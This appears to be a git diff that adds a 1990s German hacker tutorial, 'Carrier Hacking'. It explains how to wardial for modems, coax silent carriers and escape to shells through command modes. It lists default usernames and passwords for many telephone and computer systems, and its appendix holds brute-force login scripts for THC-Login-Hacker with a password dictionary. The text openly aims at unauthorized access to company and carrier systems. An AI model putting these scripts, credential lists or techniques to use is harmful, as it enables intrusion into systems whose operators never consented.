+\r
+\r
+\r
+\r
+ CARRIER HACKING\r
+\r
+ by Giemor\r
+\r
+\r
+\r
+\r
+\r
+\r
+Warum Carrier Scanning/Hacking\r
+------------------------------\r
+\r
+In der heutigen Zeit ist der Zugang zum Internet im Vergleich zu den USA \r
+sehr teuer, also kann man sich andere Wege suchen die eigenen Wege zu senken.\r
+Zum Beispiel mit einer 0130 gebuehrenfreien Nummer der Telekom.\r
+Es reicht ja schon wenn man ein Tymnet, Datex-P oder Sprintnet Dial-up findet\r
+und sich von dort aus zu einen Provider weiterverbinden laesst wie Compuserve,\r
+IBM-NET oder Aol. Mit etwas Glueck findet man einen Outdial womit man sich\r
+dann weiter verbinden lassen kann. Oder man findet zugang zu Telnet, TN3270,\r
+FTP, PPP, SLIP, Telenet, Datapac, Telepac, Decnet, X25, etc...\r
+Aber auch zum Zeitvertreib kann man sich z.B. einige oeffentliche BBS (oder\r
+nicht-oeffentliche in die man sich social-engineered) einloggen und mit\r
+Kumpels leicht Software austauschen oder man versucht herauszufinden, was\r
+sich z.B hinter den Grossrechnern des typs HP3000 oder HP MPE-XL verbirgt. \r
+\r
+\r
+\r
+Wie findet man Carriers\r
+-----------------------\r
+\r
+Der beste und schnellste Weg ist sie mit einem Wardialer zu scannen.\r
+(thc-scan, toneloc, a-dial). Man kann mit diesen Programmen einen bestimmten \r
+Bereich von Telefonnummern durchscannen lassen, wo man viel interessantes\r
+finden kann, uns aber speziell hier die gefundenen Modems interessieren.\r
+Der Scanner hat zudem den Vorteil, dass er die heufigsten emulationen, parity, \r
+data length, stop bits, ausprobiert sowie breaks sendet, <cr>, <.> etc. und \r
+schliesslich gefundene Rufnummer mit dem Text, den das gefundene Modem\r
+ausgibt in einer Logdatei speichert.\r
+Es ist von grossem Vorteil wenn das Scan-Modem die VOICE Antwort unterstuetzt,\r
+da man so mit bis zu 900% die Geschwindigkeit des Abscannens steigern kann.\r
+\r
+\r
+\r
+Was sind Silent Carriers\r
+------------------------\r
+\r
+Sehr oft bekommt man einen Connect aber nichts passiert - aber irgendein System\r
+muss ja dahinter sein. Entweder man benutzt eine falsche Terminal Emulation,\r
+oder die Baudrate ist zu hoch, oder parity, data length, stop bits sind falsch\r
+eingestellt. \r
+a) aendert parity, data length, stop bits, auf 7S1, 7S2, 8E2, 8E1.\r
+ die meisten Systeme benutzten 8N1, 7E1 und 7O1.\r
+b) aendert die Terminal emulation: \r
+ \r
+ IBM 3101 TV 910 BEEHIVE ATL078\r
+ IBM PC/FTTERM COLOR LS ADM3A UDT01\r
+ IBM PC/FTTERM MONO ADDS VP UDT02\r
+ IBM 3161/62/63 HAZEL 1500 UDT03\r
+ IBM 3151 HAZEL ESP I UDT04\r
+ IBM 3164 HAZEL ESP II UDT05\r
+ VT52 NT DISPLAY ANSI\r
+ VT100 TT 5410 ANSI-BBS\r
+ VT220 TT 5420\r
+ FALCO 500 HP 2621B Qmodem Pro unterstuetzt\r
+ WYSE 50 DG D210 diese Emulationen \r
+ \r
+c) aendert die baudrate auf 300, 600, 1200 probiert alles was euer Terminal\r
+ Programm unterstuetzt.\r
+d) drueckt oefters hinter einander, <cr>, esc, .' sendet mehrere breaks, \r
+e) Manchmal kommt es auch einfach vor das Modems nicht miteinander auskommen,\r
+ und dann keinen output anzeigen. Zum optimalen Scannen eignet sich am\r
+ besten ein Zyxel und ein USR Courier, aeltere Modelle reichen.\r
+f) im Anhang ist ein Login Hacker Script fuer Silent Carriers bei denen a bis e\r
+ versagt ;-)\r
+ \r
+\r
+\r
+Ich habe ein System gefunden\r
+----------------------------\r
+\r
+Jetzt muss man erst einmal wissen was fuer ein System man gefunden hat.\r
+Dazu eine Liste mit System Namen und standart Accounts im zweiten Teil.\r
+Dann kann man z.B. alle standart Accounts durchprobieren.\r
+Wenn man den Betreiber des Systemes kennt, z.B eine Firma, dann sollte\r
+man deren Produkte oder Mitarbeiter Namen als login und Password\r
+versuchen. Wenn das alles nichts hilft bleibt nur noch Brute Force \r
+Hacking uebrig. Man probiert mit einem programm alle moeglichen \r
+Kompinationen, Buchstaben und Zahlen an dem System aus. Am besten man\r
+macht das an einem System wo man endlos eingabe versuche hat. Ein gutes\r
+Programm dafuer ist der Thc-Login Hacker, man kann ihn an jedes beliebige\r
+System anpassen weil er mit Script Technik arbeitet. Ein Beispielscript\r
+gibts dazu im Anhang.\r
+\r
+\r
+\r
+Suspend/Command Modus\r
+---------------------\r
+\r
+Manche Firmen haben ihre dialups echt gut gesichert. Unknackbare Passwoerter\r
+etc. etc. - nur haben sie vielleicht etwas uebersehen :\r
+Viele Programme haben einen "Command Mode", wo man obwohl das Programm laeuft\r
+noch Einstellungen veraendern kann. Ein typisches Beispiel ist z.B. beim\r
+Modem das "+++" wo man dann Modem Kommandos eingeben kann, und dann mit "AT O"\r
+die Verbindung weiter benutzen kann. Andere Programme lassen sich in den\r
+Hintergrund suspenden und man kann eine shell bekommen (z.B. bei unix)\r
+Wie findet man solche Command/Suspend Modes? Sendet ein -BREAK-, ^Z, ^], ^+\r
+sowie alle weiteren Control-Codes von ^A ueber ^Z bis ^] (01 bis 29).\r
+Was kann man in solchen Modi machen? Nun das haengt vom Programm ab das so\r
+einen Command modus bietet oder das System was einen das Programm suspenden\r
+laesst. Bei Unix z.B. hat man eine shell, mit Glueck sogar eine root shell,\r
+also jackpot. Bei dem Dienstprogramm telnet auf unix, oder auch manche\r
+Dec-Server und Ascend Dialups kommt man in einen command modus wo man z.B.\r
+einen telnet, ping oder sogar ppp machen kann - kann also so das Netzwerk\r
+abscannen oder sogar hacken.\r
+\r
+\r
+\r
+Sonderfall: Internet\r
+--------------------\r
+\r
+Besonders interessant sind Rechner die am Internet angeschlossen sind.\r
+Bei manchen Connects sieht man z.B. eine IP Adresse, bei anderen den vollen\r
+hostname + domain. Damit kann man z.B. problemlos herausfinden in welchem\r
+Netz die sind (traceroute, broadcast pings, etc.) und versuchen vom Internet\r
+in den Host oder das Netzwerk hineinzukommen.\r
+Falls man nur den hostname sieht kann man sich von ftp.nw.com (Netwizards)\r
+die gesamten ping-baren hosts aller domains holen, z.B. der .com domain und\r
+darin leicht mit einem grep schauen zu welchem Netzwerk der Rechner gehoert.\r
+Falls er nicht in den Listen ist oder aber bei hostname+domain mit ping oder\r
+traceroute nicht zu erreichen ist, ist er entweder nicht angeschlossen, oder\r
+aber hinter einer Firewall, also wenn man nicht wirklich gut im hacking ist\r
+die Finger davon lassen.\r
+\r
+-------------------------------capture----------------------------------------\r
+CONNECT 14400/ARQ/MNP5\r
+Trying ...\r
+Connected to 192.354.24.5\r
+Escape character is '^]'.\r
+\r
+UNIX(r) System V Release 4.0 (sisy500)\r
+\r
+Login:\r
+-------------------------------capture----------------------------------------\r
+\r
+\r
+\r
+Systeme mit standart Accounts\r
+-----------------------------\r
+\r
+------------------------------------------------------------------------------\r
+DECserver Communications Server\r
+\r
+DECserver 90TL Communications Server V1.1 (BL44-10) - LAT V5.1\r
+\r
+Local -010- Session 1 to ZYNET1 established\r
+\r
+Login:\r
+PASSWORD:\r
+\r
+Local -011- Session 1 disconnected from ZYNET1\r
+hello>\r
+\r
+Standart Accounts:\r
+------------------\r
+ACCESS\r
+SYSTEM\r
+\r
+Eine Beschreibung von Dec-Servern in Hinsicht auf Outdials siehe THC-MAG2\r
+------------------------------------------------------------------------------\r
+Xyplex Terminal Server.\r
+\r
+Enter username> \r
+Local> \r
+ \r
+Standart Accounts:\r
+------------------\r
+ACCESS\r
+SYSTEM\r
+------------------------------------------------------------------------------\r
+\r
+Annex Command Line Interpreter * Copyright 1991 Xylogics, Inc\r
+\r
+Checking authorization, Please wait...\r
+Annex username: (Enter your NCI userid)\r
+Annex password: (Enter your NCI password)\r
+Permission granted\r
+Annex:\r
+\r
+Befehl Parameter Beschreibung\r
+---------------------------------------------------\r
+? ? [] :Hilfe\r
+bg bg [-dq] [%][%,+,-,,] :Eine Aktion in Hintergrund setzen\r
+fg fg [-q] [%][%,+,-,,] :zurueck zu einer aktuellen Aktion\r
+hangup hangup [-q] :Auflegen und Port reseten\r
+help help [] :Hilfe\r
+jobs jobs :Zeigt aktuelle Aktionen an\r
+kill kill [%][%,+,-,,]... :Kille eine Aktion\r
+stty stty [parameter [value]]... :Show/Set Annex Port Parameter\r
+telnet telnet [-rsst] [ [port]] :Starte Telnet Connection\r
+who who [[-l] []@ ...] :Zeigt System User\r
+\r
+Standart accounts:\r
+------------------\r
+guest guest\r
+------------------------------------------------------------------------------\r
+\r
+ROLM PhoneMail 9252 9254 Microcode Version 5.2\r
+Login: ?\r
+Valid login modes are:\r
+SYSADMIN,\r
+TECH,\r
+POLL.\r
+Login:tech\r
+Password:tech\r
+ROLM PhoneMail 9252 9254 Microcode Version 5.2\r
+Copyright (C) ROLM Systems 1991\r
+All Rights Reserved.\r
+Aktion:\r
+\r
+ ( Mit den Befehl "?" oder help kommt man zum folgenden menue)\r
+\r
+ The following commands are valid:\r
+ Activate <session #> - Activate the session\r
+ Broadcast - Broadcast a message to all terminals\r
+ Connect <subsystem> <node #> - Invoke the subsystem\r
+ Terminate <session #> - Terminate the session\r
+ List - List all open sessions\r
+ Logout - Terminate all sessions and log off.\r
+ Login <login mode> - Logout and login again.\r
+ Display - Display sessions status on a site.\r
+ TechView <on/off> - Enable/Disable TechView training.\r
+------------------------------------------------------------------\r
+Beschreibung aus TFC05:\r
+\r
+ActivatePM : Starts the Phone Mail system.\r
+AssignClasses : External program to assign COS to each user in the\r
+ database. Only local non-Call Processing users are\r
+ assigned classes.\r
+BackupDataBase : Create a backup of the customer database on HD or\r
+ floppies.\r
+BackupNames : Copies name header information for all subscribers to\r
+ a floppy/floppies.\r
+CallProcessing : An external program to create and maintain Mailbox\r
+ Profiles.\r
+ChannelTrace : Lists the current state of each channel. Continously\r
+ updates until interrupted.\r
+DeactivatePM : Turn off PM system. DON'T USE THIS UNLESS YOU ARE\r
+ VERY SURE OF WHAT YOU ARE DOING! Calls will no\r
+ longer be taken by the PM if it is deactivated.\r
+DList : Show distribution lists.\r
+FFormat : Format a floppy disk. The single most useless command\r
+ for a remote user.\r
+LogOff : Quit session and go to session manager menu.\r
+MonitorLogon : Monitor users logging in to PM.\r
+MonitorTapLink : Shows tap traffic on CBX integrated systems. Continues\r
+ to update until interrupted.\r
+OCConfigAndTest : Utility to configure and test all outcalling\r
+ related parameters.\r
+Profile : Add All Clear Delete Fix List Modify Purge\r
+Reports : Display reports.\r
+CallActivity : Displays call activity by the hour, with averages.\r
+\r
+Standart accounts\r
+-----------------\r
+sysadmin sysadmin\r
+operator operator\r
+poll poll oder tech\r
+tech tech oder operator\r
+\r
+Info:\r
+Eine genaue Beschreibung ueber dieses System giebt es in TFC #5\r
+------------------------------------------------------------------------------\r
+\r
+ROLM CBX II\r
+\r
+ROLM CBXII RELEASE 9004.2.34 RB295 9000D IBMHO27568\r
+BIND DATE: 7/APR/93\r
+COPYRIGHT 1980, 1993 ROLM COMPANY. ALL RIGHTS RESERVED.\r
+ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.\r
+YOU HAVE ENTERED CPU 1\r
+12:38:47 ON WEDNESDAY 2/15/1995\r
+\r
+USERNAME: op\r
+\r
+PASSWORD:\r
+\r
+ INVALID USERNAME-PASSWORD PAIR\r
+\r
+Standart Accounts:\r
+------------------\r
+op op\r
+op operator\r
+su super\r
+admin pwp\r
+eng engineer\r
+------------------------------------------------------------------------------\r
+\r
+ARC NetBlazer Version 2.1\r
+ARC-login:\r
+\r
+Standart Accounts:\r
+------------------\r
+test\r
+setup\r
+remote\r
+snmp\r
+MAV\r
+------------------------------------------------------------------------------\r
+\r
+Telebit's NetBlazer Version 2.0x5\r
+netblzr2 login:\r
+\r
+Standart Accounts:\r
+------------------\r
+test\r
+setup\r
+remote\r
+snmp\r
+MAV\r
+------------------------------------------------------------------------------\r
+\r
+IFG's VAX 8650\r
+\r
+%SECURE-I-NET, Incoming number logged by Secure-net\r
+\r
+Username: \r
+Password:\r
+Welcome to VAX 8650\r
+$\r
+\r
+Standart Accounts:\r
+------------------\r
+Vax\r
+Vms\r
+Dcl\r
+Demo\r
+Test\r
+Help\r
+News\r
+Guest\r
+Decnet\r
+Systest\r
+Uetp\r
+Default\r
+User\r
+Field\r
+Service\r
+System\r
+Manager\r
+Operator\r
+------------------------------------------------------------------------------\r
+HP 3000\r
+\r
+MPE XL:\r
+MPE XL:HELLO\r
+Expected [session name,] user.acct [,group]. (CIERR 1424)\r
+MPE XL:hello mgr.sys\r
+ENTER ACCOUNT (SYS) PASSWORD:\r
+ENTER ACCOUNT (SYS) PASSWORD:\r
+ENTER ACCOUNT (SYS) PASSWORD:\r
+\r
+Standart Accounts:\r
+------------------\r
+HELLO MANAGER.SYS\r
+HELLO MGR.SYS\r
+HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP\r
+HELLO OP.OPERATOR\r
+MGR CAROLIAN\r
+MGR CCC\r
+MGR CNAS\r
+MGR CONV\r
+MGR COGNOS\r
+OPERATOR COGNOS\r
+MANAGER COGNOS\r
+OPERATOR DISC\r
+MGR HPDESK\r
+MGR HPWORD\r
+FIELD HPWORD\r
+MGR HPOFFICE\r
+SPOOLMAN HPOFFICE\r
+ADVMAIL HPOFFICE\r
+MAIL HPOFFICE\r
+WP HPOFFICE\r
+MANAGER HPOFFICE\r
+MGR HPONLY\r
+FIELD HPP187\r
+MGR HPP187\r
+MGR HPP189\r
+MGR HPP196\r
+MGR INTX3\r
+MGR ITF3000\r
+MANAGER ITF3000\r
+MAIL MAIL\r
+MGR NETBASE\r
+MGR REGO\r
+MGR RJE\r
+MGR ROBELLE\r
+MANAGER SECURITY\r
+MGR SECURITY\r
+FIELD SERVICE\r
+MANAGER SYS\r
+MGR SYS\r
+PCUSER SYS\r
+RSBCMON SYS\r
+OPERATOR SYS\r
+OPERATOR SYSTEM\r
+FIELD SUPPORT\r
+OPERATOR SUPPORT\r
+MANAGER TCH\r
+MAIL TELESUP\r
+MANAGER TELESUP\r
+MGR TELESUP\r
+SYS TELESUP\r
+MGE VESOFT\r
+MGE VESOFT\r
+MGR WORD\r
+MGR XLSERVER\r
+\r
+Ein Login Hacker Script gibt es im Anhang\r
+------------------------------------------------------------------------------\r
+\r
+System75\r
+\r
+Login: root\r
+INCORRECT LOGIN\r
+\r
+Login: browse\r
+Password:\r
+\r
+Software Version: G3s.b16.2.2\r
+\r
+Terminal Type (513, 4410, 4425): [513]\r
+\r
+Standart Accounts:\r
+------------------\r
+bcim bcimpw\r
+bciim bciimpw\r
+bcms bcmspw, bcms\r
+bcnas bcnspw\r
+blue bluepw\r
+browse looker, browsepw\r
+craft crftpw, craftpw, crack\r
+cust custpw\r
+enquiry enquirypw\r
+field support\r
+inads indspw, inadspw, inads\r
+init initpw\r
+kraft kraftpw\r
+locate locatepw\r
+maint maintpw, rwmaint\r
+nms nmspw\r
+rcust rcustpw\r
+support supportpw\r
+tech field\r
+------------------------------------------------------------------------------\r
+AIX\r
+\r
+IBM AIX Version 3 for RISC System/6000\r
+(C) Copyrights by IBM and by others 1982, 1990.\r
+login:\r
+\r
+Standart Accounts:\r
+------------------\r
+guest guest\r
+------------------------------------------------------------------------------\r
+\r
+AS/400\r
+\r
+UserID?\r
+Password?\r
+\r
+Standart Accounts:\r
+------------------\r
+qsecofr qsecofr\r
+qsysopr qsysopr\r
+qpgmr qpgmr \r
+ibm password\r
+ibm 2222\r
+ibm service\r
+qsecofr 1111111\r
+qsecofr 2222222\r
+qserv qserv\r
+qsvr qsvr\r
+secofr secofr\r
+qsrv ibmce1\r
+------------------------------------------------------------------------------\r
+\r
+\r
+Systeme ohne Standart Accounts\r
+------------------------------\r
+\r
+CDC Cyber\r
+\r
+WELCOME TO THE NOS SOFTWARE SYSTEM.\r
+COPYRIGHT CONTROL DATA 1978, 1987.\r
+\r
+88/02/16. 02.36.53. N265100\r
+CSUS CYBER 170-730. NOS 2.5.2-678/3.\r
+FAMILY:\r
+\r
+You would normally just hit return at the family prompt. Next prompt is:\r
+\r
+USER NAME:\r
+------------------------------------------------------------------------------\r
+\r
+Cisco Router\r
+\r
+cisco_router_1> (kann jeder beliebige Promt sein)\r
+cisco_router_1>LOGIN\r
+Username:\r
+Password:\r
+------------------------------------------------------------------------------\r
+\r
+GTN\r
+\r
+WELCOME TO CITIBANK. PLEASE SIGN ON.\r
+XXXXXXXX\r
+\r
+@\r
+PASSWORD =\r
+\r
+@\r
+\r
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r
+\r
+PLEASE ENTER YOUR ID:-1->\r
+PLEASE ENTER YOUR PASSWORD:-2->\r
+\r
+CITICORP (CITY NAME). KEY GHELP FOR HELP.\r
+ XXX.XXX\r
+ PLEASE SELECT SERVICE REQUIRED.-3->\r
+------------------------------------------------------------------------------\r
+\r
+Lantronix Terminal Server\r
+\r
+Lantronix ETS16 Version V3.1/1(940623)\r
+\r
+Type HELP at the 'Local_15> ' prompt for assistance.\r
+\r
+Login password>\r
+------------------------------------------------------------------------------\r
+\r
+NIH Timesharing\r
+\r
+NIH Tri-SMP 7.02-FF 16:30:04 TTY11\r
+system 1378/1381/1453 Connected to Node Happy(40) Line # 12\r
+Please LOGIN\r
+.\r
+------------------------------------------------------------------------------\r
+\r
+VM/ESA ONLINE\r
+\r
+ TBVM2 VM/ESA Rel 1.1 PUT 9200\r
+\r
+Fill in your USERID and PASSWORD and press ENTER\r
+(Your password will not appear when you type it)\r
+USERID ===>\r
+PASSWORD ===>\r
+\r
+COMMAND ===>\r
+------------------------------------------------------------------------------\r
+\r
+\r
+\r
+ANHANG:\r
+\r
+Login Hacker Scripts:\r
+---------------------\r
+\r
+[BEGIN hp_mpe.txt]\r
+;\r
+;\r
+; ------------------------------------------------------------------------\r
+; HP MPE-XL : SAC-Script for THC-Login-Hacker v1.0 (by van Hauser)\r
+; ------------------------------------------------------------------------\r
+;\r
+;\r
+; MPE XL:\r
+; EXPECTED A :HELLO COMMAND. (CIERR 6057)\r
+; MPE XL: hello\r
+; EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424)\r
+;\r
+; \r
+=============================================================================\r
+#DEFINE\r
+PHONE_NR=*\r
+LOGFILE=*.log\r
+DIAL_TRIES=100\r
+LOGIN_TRIES=0\r
+DIC(1)=hp_mpe_a.dic\r
+; uncomment command lines below to check for 6 more common MPE passwords\r
+\r
+#NOCARRIER\r
+LOG(CARRIER LOST on $DATE at $TIME)\r
+\r
+LOG()\r
+GOTO(1)\r
+\r
+#START\r
+LOG(--------------------------------------------------------------------------)\r
+LOG( TARGET : $PHONE_NR )\r
+LOG( DATE : $DATE )\r
+LOG( TIME : $TIME )\r
+LOG()\r
+LOG_SESSION_ON\r
+SET D_TMP=1\r
+SET S_TMP=X\r
+\r
+:1\r
+SET STRING=X\r
+DIAL\r
+WAIT(1)\r
+IF STRING~XL THEN GOTO(2)\r
+WAIT4STRING(2,^M,6,GOTO(1),XL)\r
+\r
+:2\r
+SET STRING=X\r
+\r
+SEND_(HELLO )\r
+IF D_TMP=1 THEN SEND_(ADVMAIL.)\r
+IF D_TMP=2 THEN SEND_(FIELD.)\r
+IF D_TMP=3 THEN SEND_(MAIL.)\r
+IF D_TMP=4 THEN SEND_(MANAGER.)\r
+IF D_TMP=5 THEN SEND_(MGE.)\r
+IF D_TMP=6 THEN SEND_(MGR.)\r
+IF D_TMP=7 THEN SEND_(OP.)\r
+IF D_TMP=8 THEN SEND_(OPERATOR.)\r
+IF D_TMP=9 THEN SEND_(PCUSER.)\r
+IF D_TMP=10 THEN SEND_(RSBCMON.)\r
+IF D_TMP=11 THEN SEND_(SPOOLMAN.)\r
+IF D_TMP=12 THEN SEND_(SYS.)\r
+IF D_TMP=13 THEN SEND_(WP.)\r
+\r
+IF S_TMP=X THEN SEND_NEXT_DIC(1)\r
+IF S_TMP=Y THEN SEND_DIC(1)\r
+IF S_TMP=Z THEN SEND_DIC(1)\r
+IF S_TMP=A THEN SEND_DIC(1)\r
+; IF S_TMP=B THEN SEND_DIC(1)\r
+; IF S_TMP=C THEN SEND_DIC(1)\r
+\r
+IF D_TMP=13 THEN SET S_TMP=X\r
+IF D_TMP=13 THEN SET D_TMP=1\r
+WAIT(1)\r
+; set this higher if the system response is slow\r
+IF STRING2~HELLO THEN GOTO(3)\r
+IF STRING2~exists THEN GOTO(3)\r
+IF STRING2~on-ex THEN GOTO(4)\r
+IF STRING2~ASSW THEN GOTO(5)\r
+WAIT(2)\r
+IF STRING2~HELLO THEN GOTO(3)\r
+IF STRING2~exists THEN GOTO(3)\r
+IF STRING2~on-ex THEN GOTO(4)\r
+IF STRING2~ASSW THEN GOTO(5)\r
+GOTO(1)\r
+\r
+:3\r
+INC(D_TMP)\r
+GOTO(2)\r
+\r
+:4\r
+SET S_TMP=X\r
+SET D_TMP=1\r
+\r
+:5\r
+IF S_TMP=Z THEN GOTO(6)\r
+IF S_TMP=A THEN GOTO(7)\r
+;IF S_TMP=B THEN GOTO(8)\r
+;IF S_TMP=C THEN GOTO(9)\r
+SET S_TMP=Z\r
+LOG_($DIC(1))\r
+SEND_DIC(1)\r
+WAIT(1)\r
+LOG_(HPOnly)\r
+SEND(HPOnly)\r
+WAIT(1)\r
+LOG_(HP)\r
+SEND(HP)\r
+WAIT(2)\r
+GOTO(1)\r
+\r
+:6\r
+SET S_TMP=A\r
+LOG_(MPE)\r
+SEND(MPE)\r
+\r
+LOG_(Manager)\r
+SEND(Manager)\r
+WAIT(1)\r
+LOG_(mgr)\r
+SEND(mgr)\r
+WAIT(2)\r
+GOTO(1)\r
+\r
+:7\r
+SET S_TMP=X\r
+; SET S_TMP=B\r
+LOG_(remote)\r
+SEND(remote)\r
+WAIT(1)\r
+LOG_(TeleSup)\r
+SEND(TeleSup)\r
+WAIT(1)\r
+LOG_(operator)\r
+SEND(operator)\r
+WAIT(2)\r
+GOTO(1)\r
+\r
+\r
+; SET S_TMP=C\r
+; LOG_(tech)\r
+; SEND(tech)\r
+; WAIT(1)\r
+; LOG_(mail)\r
+; SEND(mail)\r
+; WAIT(1)\r
+; LOG_(hpoffice)\r
+; SEND(hpoffice)\r
+; WAIT(2)\r
+; GOTO(1)\r
+\r
+; :9\r
+; SET S_TMP=X\r
+; LOG_(sys)\r
+; SEND(sys)\r
+; WAIT(1)\r
+; LOG_(security)\r
+; SEND(security)\r
+; WAIT(1)\r
+; LOG_(support)\r
+; SEND(support)\r
+; LOG_(hpoffice)\r
+; SEND(hpoffice)\r
+; WAIT(2)\r
+; GOTO(1)\r
+\r
+; :9\r
+; SET S_TMP=X\r
+; LOG_(sys)\r
+; SEND(sys)\r
+; WAIT(1)\r
+; LOG_(security)\r
+; SEND(security)\r
+; WAIT(1)\r
+; LOG_(support)\r
+; SEND(support)\r
+\r
+; GOTO(1)\r
+\r
+:100\r
+LOG()\r
+LOG( END OF : $PHONE_NR )\r
+LOG(--------------------------------------------------------------------------)\r
+#END\r
+[END]\r
+\r
+\r
+\r
+[BEGIN hp_mpe_a.dic]\r
+CAROLIAN\r
+CCC\r
+CNAS\r
+COGNOS\r
+CONV\r
+DISC\r
+HP\r
+HPDESK\r
+HPOFFICE\r
+HPONLY\r
+HPP187\r
+HPP189\r
+HPP196\r
+HPUNSUP\r
+HPWORD\r
+INTX3\r
+ITF3000\r
+MAIL\r
+NETBASE\r
+OPERATOR\r
+REGO\r
+RJE\r
+ROBELLE\r
+HPP187\r
+HPP189\r
+HPP196\r
+HPUNSUP\r
+HPWORD\r
+INTX3\r
+ITF3000\r
+MAIL\r
+NETBASE\r
+OPERATOR\r
+REGO\r
+RJE\r
+ROBELLE\r
+SERVICE\r
+SUPPORT\r
+SYS\r
+SYSTEM\r
+TCH\r
+TELESUP\r
+VESOFT\r
+WORD\r
+XLSERVER\r
+[END]\r
+\r
+\r
+[BEGIN silent.txt]\r
+;\r
+;\r
+; ------------------------------------------------------------------------\r
+; Silent Dialups : SAC-Script for THC-Login-Hacker v1.0 (by van Hauser)\r
+; ------------------------------------------------------------------------\r
+;\r
+; Silent Dialups : No output/response from dialup modem\r
+; (both types, 30 sec hangup & unlimited)\r
+;\r
+; (takes approx. 9-10 hours)\r
+;\r
+; \r
+=============================================================================\r
+#DEFINE\r
+PHONE_NR=####\r
+LOGFILE=####\r
+DIAL_TRIES=50\r
+LOGIN_TRIES=0\r
+BRUTE(1)=^$,1,1,3\r
+; tries every combination of Controll-Chars and Misc. Chars from 1 to 3 length.\r
+\r
+#NOCARRIER\r
+CHECK4OUTPUT(OFF)\r
+LOG(CARRIER LOST on $DATE at $TIME)\r
+\r
+LOG()\r
+LOG()\r
+GOTO(1)\r
+\r
+#START\r
+LOG(--------------------------------------------------------------------------)\r
+LOG( TARGET : $PHONE_NR )\r
+LOG( DATE : $DATE )\r
+LOG( TIME : $TIME )\r
+LOG()\r
+LOG_SESSION_ON\r
+\r
+:1\r
+DIAL\r
+WAIT(1)\r
+CHECK4OUTPUT(99)\r
+\r
+:2\r
+SEND_NEXT_BRUTE(1)\r
+WAIT_(255)\r
+;waits 255ms between every attempt\r
+GOTO(2)\r
+CHECK4OUTPUT(99)\r
+\r
+:2\r
+SEND_NEXT_BRUTE(1)\r
+WAIT_(255)\r
+;waits 255ms between every attempt\r
+GOTO(2)\r
+\r
+:99\r
+CHECK4CARRIER(OFF)\r
+WAIT(5)\r
+CHECK4CARRIER(#NOCARRIER)\r
+\r
+:100\r
+HANGUP\r
+BEEP\r
+BEEP\r
+BEEP\r
+LOG()\r
+LOG()\r
+LOG( FOUND : $BRUTE(1))\r
+LOG(--------------------------------------------------------------------------)\r
+#END\r
+[END]\r
+\r
+\1a
\ No newline at end of file
projects / oweals / thc-archive.git / blobdiff